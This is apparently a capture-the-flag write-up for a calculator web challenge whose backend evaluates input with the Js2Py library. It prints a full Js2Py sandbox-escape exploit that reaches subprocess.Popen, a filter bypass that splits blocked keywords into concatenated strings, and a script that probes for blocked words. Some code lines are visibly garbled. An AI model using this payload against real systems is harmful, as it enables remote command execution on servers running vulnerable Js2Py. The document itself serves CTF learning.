This is my first calculator ever, and it might have a 0day!!!
In this challenge we were given a simple calculator which would allow us to do some numerical calculation. Ananlyzing the request it is sending in BurpSuite we see that it is sending inputs
in a POST
request at /results
In order to make it easy to interact with the application, I made a simple script to send whatever inputs needed.
import requests
baseURL = "" # Your instance url (like
def result(inputs):
url = baseURL + "/result"
sendJSON = {"inputs": inputs}
r =, json=sendJSON)
return r
Now we can easily send whatever we need as our input.
The first intuition I had in this challenge was that it might be calculating the answer in an eval
and we might be able to somehow execute our code in there. But after trying to send a number of things, I found that certain things were blocked. Like we could not send eval
and there were many such words and the response would be Hacking Attempts!
Finally I had tried sending Object.getOwnPropertyNames(this)
and it finally returned something.
{'result': "dict_keys(['true', 'false', 'null', 'undefined', 'Infinity', 'NaN', 'console', 'String', 'Number', 'Boolean', 'RegExp', 'Math', 'Date', 'Object', 'Function', 'Array', 'Int8Array', 'Uint8Array', 'Uint8ClampedArray', 'Int16Array', 'Uint16Array', 'Int32Array', 'Uint32Array', 'Float32Array', 'Float64Array', 'ArrayBuffer', 'parseFloat', 'parseInt', 'isFinite', 'isNaN', 'escape', 'unescape', 'encodeURI', 'decodeURI', 'encodeURIComponent', 'decodeURIComponent', 'Error', 'EvalError', 'TypeError', 'RangeError', 'ReferenceError', 'SyntaxError', 'URIError', 'eval', 'JSON', 'this', 'window', 'PyJsEvalResult'])", 'status': 'success'}
Here, PyJsEvalResult
was interesting. After googling a bit, one of my teammates found PiotrDabkowski/Js2Py repository. This is what the server was using to calculate our answers and there was a recent exploit in this that gave could allow remote code execution.
We simply had to use the exploit given here, to get the rce.
But when we sent the exploit, the server would simply respond with Hacking Attempts!
which meant there be certain words in the exploit that were blocked.
The bypass we found for this filter was to use string concatenation. eval
was blocked but if we sent it as this['e' + 'val']
, it would work. That space is important as 'e'+'val'
was still blocked but but when I sent 'e' + 'val'
, it worked (I don’t exactly know why).
Thus for our final exploit we used a script to find out all the words in the exploit that were blocked and then used the above technique to bypass the filter and obtained RCE.
import requests
baseURL = "" # Your instance url (like
def result(inputs):
url = baseURL + "/result"
sendJSON = {"inputs": inputs}
r =, json=sendJSON)
return r
exploit = """
let cmd = "ca" + "t /fla" + "g.txt"
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__
function findpopen(o) {
let result;
for(let i in o['_' + '_su' + 'bcl' + 'asses__']()) {
let item = o['_' + '_s' + 'ubc' + 'lasses__']()[i]
if(item.__module__ == "subpr" + "ocess" && item.__name__ == "Po" + "pen") {
return item
if(item.__name__ != "type" && (result = findpopen(item))) {
return result
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
# Code for checking the blocked words
# words = exploit.split()
# words = set(words)
# blocked = list()
# for word in words:
# # print("Exploit:", word)
# res = result(word).json()
# if res["result"].lower() == "hacking attempts!":
# blocked.append(word)
# print(blocked)
res = result(exploit).json()
if res["result"].lower() == "hacking attempts!":